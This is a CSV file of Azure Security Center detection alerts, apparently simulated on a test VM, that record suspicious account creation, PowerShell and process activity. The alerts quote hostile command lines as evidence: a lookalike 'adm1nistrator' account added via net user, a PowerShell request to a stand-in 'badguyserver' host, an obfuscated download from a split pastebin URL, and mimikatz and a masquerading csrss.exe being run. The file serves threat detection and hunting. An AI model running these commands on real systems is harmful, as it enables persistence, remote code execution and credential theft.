45,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:03,2019-01-15 09:15:03,526e34b6-6578-4fc0-9db6-e126b4d673f0,2518547570966661760_526e34b6-6578-4fc0-9db6-e126b4d673f0,Detection,Microsoft,Suspicious Account Creation Detected,Suspicious Account Creation Detected,Suspicious Account Creation Detected,"Analysis of host data on MSTICALERTSWIN1 detected creation or use of a local account adm1nistrator : this account name closely resembles a standard Windows account or group name 'administrator'. This is potentially a rogue account created by an attacker, so named in order to avoid being noticed by a human administrator.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""adm1nistrator"",
""Account Session Id"": ""0x0"",
""Suspicious Process"": ""c:\\windows\\system32\\net.exe"",
""Suspicious Command Line"": ""net user adm1nistrator bob_testing /add"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x141c"",
""Suspicious Account Name"": ""adm1nistrator"",
""Similar To Account Name"": ""administrator"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""adm1nistrator"",
""Host"": {
""$ref"": ""4""
},
""Type"": ""account"",
""LogonId"": ""0x0""
},
{
""$id"": ""6"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""7"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""8"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""9"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""net.exe"",
""Type"": ""file""
},
{
""$id"": ""10"",
""ProcessId"": ""0x141c"",
""CommandLine"": ""net user adm1nistrator bob_testing /add"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:03.3338239Z"",
""ImageFile"": {
""$ref"": ""9""
},
""Account"": {
""$ref"": ""8""
},
""ParentProcess"": {
""$ref"": ""7""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""11"",
""SessionId"": ""0x0"",
""StartTimeUtc"": ""2019-01-15T09:15:03.3338239Z"",
""EndTimeUtc"": ""2019-01-15T09:15:03.3338239Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""5""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:08,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
46,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:11,2019-01-15 09:15:11,92a2f884-5827-4fb6-acf8-b0087b76aa73,2518547570884378777_92a2f884-5827-4fb6-acf8-b0087b76aa73,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1008"",
""Suspicious Script"": "".\\powershell -Noninteractive -Noprofile -Command \""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"""",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1008"",
""CommandLine"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:11.5621222Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:11.5621222Z"",
""EndTimeUtc"": ""2019-01-15T09:15:11.5621222Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
47,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:11,2019-01-15 09:15:11,4ca5c629-673c-4372-9bd3-ab7bf6d6e6f0,2518547570881721037_4ca5c629-673c-4372-9bd3-ab7bf6d6e6f0,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-reversednslookup.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x14e0"",
""Suspicious Script"": "".\\powershell Invoke-ReverseDnsLookup.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x14e0"",
""CommandLine"": "".\\powershell invoke-reversednslookup.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:11.8278962Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:11.8278962Z"",
""EndTimeUtc"": ""2019-01-15T09:15:11.8278962Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
48,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:13,2019-01-15 09:15:13,029c9c95-c1fe-4419-bc3b-a6d832c87e65,2518547570862568702_029c9c95-c1fe-4419-bc3b-a6d832c87e65,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,"Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\mimikatz.exe' was running on the machine, often associated with attacker attempts to access credentials.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\mimikatz.exe"",
""Suspicious Command Line"": "".\\mimikatz.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x8e4"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""mimikatz.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x8e4"",
""CommandLine"": "".\\mimikatz.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:13.7431297Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:13.7431297Z"",
""EndTimeUtc"": ""2019-01-15T09:15:13.7431297Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
49,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:14,2019-01-15 09:15:14,3ca6ca5a-8bf2-417f-b8c9-3cea37c84f4b,2518547570852901341_3ca6ca5a-8bf2-417f-b8c9-3cea37c84f4b,Detection,Microsoft,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,"Analysis of host data on MSTICALERTSWIN1 detected a command-line with anomalous mix of upper and lower case characters. This kind of pattern, while possibly benign, is also typical of attackers trying to hide from case-sensitive or hash-based rule matching when performing administrative tasks on a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\rundll32.exe"",
""Suspicious Command Line"": "".\\rundll32 /c shell32control_randll.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x10fc"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""rundll32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x10fc"",
""CommandLine"": "".\\rundll32 /c shell32control_randll.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:14.7098658Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:14.7098658Z"",
""EndTimeUtc"": ""2019-01-15T09:15:14.7098658Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
50,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:13,2019-01-15 09:15:13,bddac8c5-cba5-4da2-a6dd-c0a39fc2b256,2518547570860979996_bddac8c5-cba5-4da2-a6dd-c0a39fc2b256,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1038"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1038"",
""CommandLine"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:13.9020003Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:13.9020003Z"",
""EndTimeUtc"": ""2019-01-15T09:15:13.9020003Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
51,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:11,2019-01-15 09:15:11,c1a9004f-7f64-4144-8ce0-8f76f9041703,2518547570880067443_c1a9004f-7f64-4144-8ce0-8f76f9041703,Detection,Microsoft,Detected obfuscated command line.,Detected obfuscated command line.,Detected obfuscated command line.,Attackers use increasingly complex obfuscation techniques to evade detections that run against the underlying data. Analysis of host data on MSTICALERTSWIN1 detected suspicious indicators of obfuscation on the command line.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xb10"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xb10"",
""CommandLine"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:11.9932556Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:11.9932556Z"",
""EndTimeUtc"": ""2019-01-15T09:15:11.9932556Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
52,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:13,2019-01-15 09:15:13,c6f3dea2-fe36-4e65-b161-1b1cd1104eb3,2518547570865502616_c6f3dea2-fe36-4e65-b161-1b1cd1104eb3,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\windows\\fonts\\csrss.exe"",
""Suspicious Command Line"": ""c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1684"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1684"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:13.4497383Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:13.4497383Z"",
""EndTimeUtc"": ""2019-01-15T09:15:13.4497383Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
53,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:13,2019-01-15 09:15:13,9d5e263f-55d2-441f-acf4-bf569b4cd976,2518547570865502616_9d5e263f-55d2-441f-acf4-bf569b4cd976,Detection,Microsoft,Suspicious system process executed,Suspicious system process executed,Suspicious system process executed,The system process c:\windows\fonts\csrss.exe was observed running in an abnormal context. Malware often uses this process name to masquerade its malicious activity.,Medium,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\fonts\\csrss.exe"",
""command line"": ""c:\\windows\\fonts\\csrss.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1684"",
""account logon id"": ""0x13bded7"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x165c"",
""System Process"": ""CSRSS.EXE"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1684"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:13.4497383Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:13.4497383Z"",
""EndTimeUtc"": ""2019-01-15T09:15:13.4497383Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
